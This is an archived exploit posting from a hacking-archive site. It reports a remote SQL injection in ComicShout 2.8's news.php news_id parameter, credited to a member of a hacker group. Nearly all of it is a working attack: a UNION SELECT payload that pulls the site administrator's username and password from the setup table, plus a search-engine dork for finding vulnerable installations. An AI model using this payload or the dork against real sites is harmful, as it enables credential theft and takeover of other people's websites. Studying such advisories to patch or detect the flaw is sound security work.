AOH :: HP Unsorted C :: BX3380.HTM

ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability



ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability
ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability



--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--=0D 
--==+         ComicShout 2.8 (news.php news_id) Remote SQL Injection Vulnerability       +==--=0D
--==+====================================================================================+==--=0D
                         - dreaming of necessity is reason to comply -=0D
=0D
[+] Info:=0D
=0D
[~] Bug found by JosS=0D
[~] sys-project[at]hotmail.com=0D
[~] http://www.spanish-hackers.com=0D 
[~] EspSeC & Hack0wn!.=0D
=0D
=0D
[~] Software: ComicShout 2.8=0D
[~] Exploit: Remote SQL Injection [High]=0D
[~] Vuln file: news.php=0D
=0D
[~] Dork: "Powered by ComicShout"=0D
=0D
[+] Exploit:=0D
=0D
[~] /news.php?news_id=[SQL]=0D
[~] 4+union+all+select+0,1,site_admin,site_pass+from+setup/*=0D
=0D
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--=0D 
--==+                                       JosS                                         +==--=0D
--==+====================================================================================+==--=0D
                                       [+] [The End]

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.